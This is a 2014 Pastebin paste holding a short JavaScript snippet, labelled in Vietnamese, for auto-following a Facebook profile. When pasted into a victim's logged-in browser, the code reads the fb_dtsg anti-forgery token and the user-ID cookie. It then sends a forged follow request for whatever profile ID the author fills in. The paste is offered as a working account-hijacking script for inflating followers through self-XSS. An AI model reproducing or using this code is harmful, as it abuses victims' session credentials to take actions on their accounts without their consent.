Advertisement
thjeubg3

Code Auto Sub Profile (Cá Nhân)

Oct 13th, 2014
289
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.59 KB | None | 0 0
  1. //*Code Auto Sub Profile (Cá Nhân)
  2.  
  3. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  4. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  5. function a(abone)
  6. { var http4=new XMLHttpRequest;
  7. var url4="/ajax/follow/follow_profile.php?__a=1";
  8. var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";
  9. http4.open("POST",url4,true);
  10. http4.onreadystatechange=function()
  11. { if(http4.readyState==4&&http4.status==200)http4.close };
  12. http4.send(params4)}
  13.  
  14. a("Nhập ID");
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement